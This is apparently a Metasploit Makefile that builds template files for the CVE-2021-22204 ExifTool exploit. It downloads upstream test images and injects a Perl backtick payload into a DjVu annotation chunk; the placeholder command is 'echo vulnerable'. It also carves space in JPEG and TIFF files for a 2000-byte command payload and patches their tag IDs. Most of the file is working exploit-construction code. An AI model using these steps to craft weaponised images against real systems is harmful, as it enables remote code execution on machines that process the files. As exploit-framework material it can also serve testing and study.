data/exploits/CVE-2021-22204/Makefile
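# Regenerates the CVE-2021-22204 template files kept next to this Makefile.
# Only `all` and `clean` are phony: msf.djvu, msf.jpg and msf.tif are real
# build products, so an existing file is no longer re-downloaded and
# re-patched on every `make`; run `make clean` (or delete one of the files)
# to force regeneration.
.PHONY: all clean

# Every recipe below writes $@ in several non-atomic steps (curl, then
# in-place edits). Drop a half-built target when any step fails instead of
# leaving a partially patched file that looks up to date.
.DELETE_ON_ERROR:

all: msf.djvu msf.jpg msf.tif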

# Remove the generated template files only; the pinned upstream test images
# are fetched again by the next build.
clean:
    $(RM) msf.djvu msf.jpg msf.tif

# DjVu template: start from an upstream ExifTool test image, set the author
# via the djvused script set_author.dsed (expected next to this Makefile; not
# shown here), then rewrite the ANT chunk and two length fields in place.
# The download is pinned to an exact upstream commit but no checksum is
# verified: if the fetched bytes ever differ from the pinned file, the fixed
# dd offsets below (seek=8, seek=174) would land on the wrong bytes without
# any error. Nothing here is atomic, so a failing step leaves a partial $@.
# The perl rewrite names msf.djvu literally rather than $@; the final
# djvudump only prints the structure — its output is not compared against
# anything, so it catches a file djvudump cannot parse, not a wrong patch.
msf.djvu:
    curl -L https://github.com/exiftool/exiftool/raw/ca8685788f5763c547349f239764bd19cf1952da/t/images/DjVu.djvu -o $@
    djvused -f set_author.dsed -s $@
    # Rewrite the ANT section as uncompressed data with an 'echo vulnerable' payload
    perl -0777 -pi -e 's!DJVIANTz.*!DJVIANTa\x00\x00\x00\x39(metadata (Author "\\c\@{[`echo vulnerable > /dev/tty`]}"))!s;' msf.djvu
    # Fix up some length fields
    perl -e 'print "\x00\x00\x00\xeb"' | dd of=$@ bs=1 seek=8 count=4 conv=notrunc
    perl -e 'print "\x00\x00\x00\x45"' | dd of=$@ bs=1 seek=174 count=4 conv=notrunc
    # Test the file
    djvudump $@

# JPEG template: a commit-pinned upstream ExifTool test image, scrubbed of all
# metadata, then given a 2221-byte placeholder 'Processing Software' value
# whose tag ID is rewritten by sed (the `$$(...)` is shell command
# substitution; Make turns `$$` into a single `$`). As with the other
# targets the download is not checksum-verified, and the steps are not
# atomic. `sed -i` with \x escapes is GNU sed syntax (BSD/macOS sed differs),
# and the substitution replaces only the first \x00\x0b match on each
# newline-delimited line, which is assumed to be the tag header of the
# field just written — re-check this if the source image or tag value changes.
msf.jpg:
    curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/Writer.jpg -o $@
    # Scrub the file
    exiftool -overwrite_original -all= $@
    # Create a cave big enough for the djvu template plus a 2000 byte CMD payload
    exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
    # Change the 'Processing Software' field to a HasselbladExif field
    sed -i 's/\x00\x0b/\xc5\x1b/' $@

# TIFF template: same construction as msf.jpg from a commit-pinned upstream
# ExifTool test image. After the `-all=` scrub a second exiftool pass clears
# named IFD0 fields explicitly; I can't tell from here which of those survive
# the first pass, so treat the second call as belt-and-braces. The download
# is not checksum-verified, the steps are not atomic, and the final `sed -i`
# is GNU sed syntax that rewrites only the first \x00\x0b match per
# newline-delimited line — assumed to be the tag ID of the field written
# just above; verify if the source image changes.
msf.tif:
    curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/ExifTool.tif -o $@
    # Scrub the file
    exiftool -overwrite_original -all= $@
    # Selectively scrub IFD0 fields
    exiftool -overwrite_original -ImageDescription= -Make= -Model= -Software= -ModifyDate= $@
    # Create a cave big enough for the djvu template plus a 2000 byte CMD payload
    exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
    # Change the 'Processing Software' field to a HasselbladExif field
    sed -i 's/\x00\x0b/\xc5\x1b/' $@